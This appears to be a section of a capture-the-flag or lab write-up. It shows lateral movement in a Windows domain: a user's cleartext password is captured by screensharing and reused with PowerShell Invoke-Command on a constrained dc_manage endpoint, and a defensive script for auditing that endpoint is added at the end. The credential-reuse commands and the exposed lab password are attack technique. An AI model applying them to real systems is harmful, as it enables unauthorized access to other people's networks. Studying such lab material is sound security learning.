imonks


In the course of the assessment, the edavies user’s account was compromised, giving a PowerShell session to the Acute-PC01 host. It was then observed that a second, interactive session existed under the same user, identifiable by a different logon time. The decision was made to investigate that user’s activity with Metasploit’s screenshare module, which provided real-time access to their screen.

During the screenshare session, it was noted that the edavies user attempted to initiate a PowerShell session targeting the ATSSERVER host, using the imonks user’s credentials within the dc_manage configuration. While doing so, the edavies user inadvertently exposed the CLEARTEXT password associated with the imonks user’s account.

With knowledge of the imonks user’s credentials now at hand, there exists the potential for lateral movement within the target domain, posing security risks and allowing for further unauthorized actions.

Attempting to authenticate to the ATSSERVER host with the imonks user’s credentials via the PSWA endpoint results in failure. Interestingly, it produces the very same odd error message observed earlier while attempting to gain the initial foothold on the Acute-PC01 host as the edavies user:

PS C:\Utils> $Cred = New-Object System.Management.Automation.PSCredential("ACUTE.LOCAL\imonks", (ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force))
 
PS C:\Utils> Enter-PSSession -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage
Enter-PSSession : The term 'Measure-Object' is not recognized as the name of a cmdlet, function, script file, or 
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try 
again.
At line:1 char:1
+ Enter-PSSession -ComputerName ATSSERVER -Credential $Cred -Configurat ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Measure-Object:String) [Enter-PSSession], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

Leveraging the existing PowerShell session as the edavies user still results in failure with the exact same error message: “The term ‘Measure-Object’ is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.”

The issue is likely caused by the Kerberos double-hop problem.

Invoke-Command


PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ScriptBlock {whoami}
 
[ATSSERVER] Connecting to remote server ATSSERVER failed with the following error message : Access is denied. For more 
information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (ATSSERVER:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken
 
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {whoami}
 
acute\imonks

However, it can be worked around with PowerShell’s Invoke-Command cmdlet. Note that -ConfigurationName dc_manage is still required: as the output above shows, without it the connection targets the default endpoint, which denies the imonks user access, whereas the dc_manage endpoint accepts the credential.

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {whoami}
acute\imonks
 
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {hostname}
ATSSERVER
 
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {ipconfig}
The term 'ipconfig.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check 
the spelling of the name, or if a path was included, verify that the path is correct and try again.
    + CategoryInfo          : ObjectNotFound: (ipconfig.exe:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
    + PSComputerName        : ATSSERVER

Initial foothold established on the ATSSERVER host as the imonks user via PowerShell’s Invoke-Command cmdlet. However, only a limited set of commands appears to be available under the dc_manage configuration.
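The errors returned by the dc_manage endpoint are informative from the defender’s side as well: a constrained session configuration that hides commands produces exactly this kind of CommandNotFoundException (ipconfig.exe above), and Enter-PSSession needs a small baseline of cmdlets (the set JEA exposes by default, Measure-Object among them) to run interactively. The following PowerShell is an added example, not part of the original writeup and not something that was run on the target: executed as an administrator on the host that registered dc_manage, it reports who may connect, what one user would actually see, and which baseline cmdlets are hidden. Get-PSSessionConfiguration and Get-PSSessionCapability are built-in cmdlets; the function and variable names, and the baseline list being the cause of the interactive failure, are this example’s own assumptions.

```powershell
# Added example (not from the original writeup): audit what a constrained
# session configuration exposes to a given user. Run on the host that
# registered the configuration, from an elevated PowerShell prompt.
# Function and variable names are this example's own.

# Cmdlets that JEA exposes by default so that interactive remoting works.
# Assumption: an endpoint that hides these is what makes Enter-PSSession
# fail with a CommandNotFoundException such as the Measure-Object error.
$InteractiveBaseline = @(
    'Clear-Host', 'Exit-PSSession', 'Get-Command', 'Get-FormatData',
    'Get-Help', 'Measure-Object', 'Out-Default', 'Select-Object'
)

function Get-EndpointExposure {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $ConfigurationName,
        [Parameter(Mandatory)] [string] $UserName        # DOMAIN\user
    )

    # Who is allowed to connect to the endpoint and which account it runs as.
    $config = Get-PSSessionConfiguration -Name $ConfigurationName -ErrorAction Stop

    # What this particular user would be able to run once connected
    # (respects the role capabilities assigned to the user's groups).
    $visible = @(Get-PSSessionCapability -ConfigurationName $ConfigurationName -Username $UserName)

    $visibleNames = @($visible | Select-Object -ExpandProperty Name | Sort-Object -Unique)
    $external     = @($visible | Where-Object CommandType -eq 'Application' |
                        Select-Object -ExpandProperty Name | Sort-Object -Unique)
    $missing      = @($InteractiveBaseline | Where-Object { $_ -notin $visibleNames })

    [pscustomobject]@{
        Configuration     = $config.Name
        Permission        = $config.Permission
        RunAsUser         = $config.RunAsUser
        VisibleCommands   = $visibleNames.Count
        Cmdlets           = @($visible | Where-Object CommandType -eq 'Cmdlet').Count
        Functions         = @($visible | Where-Object CommandType -eq 'Function').Count
        # Empty here means native binaries such as ipconfig.exe are not exposed.
        ExternalCommands  = if ($external) { $external -join ', ' } else { '(none)' }
        # Any entry here explains an Enter-PSSession "not recognized" failure.
        HiddenInteractive = if ($missing) { $missing -join ', ' } else { '(none)' }
    }
}

# The endpoint and account from the writeup; run on the host that owns dc_manage.
Get-EndpointExposure -ConfigurationName 'dc_manage' -UserName 'ACUTE\imonks' | Format-List
```

Comparing HiddenInteractive against the baseline tells the administrator whether an Enter-PSSession failure is an authorization problem or simply the endpoint doing what it was configured to do; an unexpectedly long ExternalCommands list is the more important finding, since every native binary exposed through a constrained endpoint widens what a stolen credential can reach.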